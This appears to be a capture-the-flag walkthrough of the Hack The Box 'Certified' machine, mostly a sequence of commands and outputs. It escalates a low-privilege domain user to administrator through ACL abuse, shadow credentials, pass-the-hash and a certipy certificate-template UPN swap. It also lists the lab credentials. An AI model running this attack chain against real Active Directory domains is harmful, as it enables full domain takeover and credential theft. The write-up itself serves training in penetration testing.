Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!
We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:
Username: judith.mader
Password: judith09
User Account: judith.mader (Low privilege)
Target: Escalate privileges to root on the machine.
Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.
An initial Nmap scan revealed several open ports on the domain controller (DC01):
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP over SSL 3268/tcp open ldap Microsoft Global Catalog 3269/tcp open ssl/ldap Microsoft Global Catalog over SSL 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing
Key observations:
Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.
SSL Certificates: The certificate details revealed the hostname DC01.certified.htb and additional domain information, confirming the target's role as a certificate authority.
SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.
With the obtained credentials, SMB authentication was tested using nxc:
nxc smb $IP -u 'judith.mader' -p 'judith09'
Output:
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.
To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:
nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41
Output:
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09 LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group LDAP 10.10.11.41 389 DC01 Done in 00M 33S LDAP 10.10.11.41 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip
The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.
The BloodHound graph revealed several key attack paths within the Active Directory environment:
Used bloodyAD to set judith.mader as the owner of the “Management” group:
bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
Updated the group permissions with dacledit.py:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
Added judith.mader to the “Management” group:
bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
Used pywhisker to create a certificate for management_svc:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
Generated a Kerberos TGT for management_svc:
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache
Extracted NT hash for management_svc using gettgtpkinit.py:
python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX
Logged in as management_svc with Evil-WinRM:
evil-winrm -i $IP -u management_svc -H $NT-Hash #Use NT Hash
Discovered that management_svc had GenericAll rights over ca_operator.
Used certipy-ad to modify ca_operator KeyCredential:
certipy-ad shadow auto -u [email protected] -hashes $NT-Hash -account ca_operator
Updated the UPN (UserPrincipalName) of ca_operator to administrator:
certipy-ad account update -u [email protected] -hashes $NT-Hash -user ca_operator -upn administrator
Requested a certificate for the administrator account using certipy-ad:
certipy-ad req -username [email protected] -hashes $NT-Hash -ca certified-DC01-CA -template CertifiedAuthentication
Restored ca_operator’s UPN to its original value:
certipy-ad account update -u [email protected] -hashes $NT-Hash -user ca_operator -upn [email protected]
Authenticated as administrator with the new certificate:
certipy-ad auth -pfx administrator.pfx -domain certified.htb
Logged in with Evil-WinRM as administrator:
evil-winrm -u administrator -H $NT-Hash-1 -i $IP
Result: Full compromise of the Certified machine.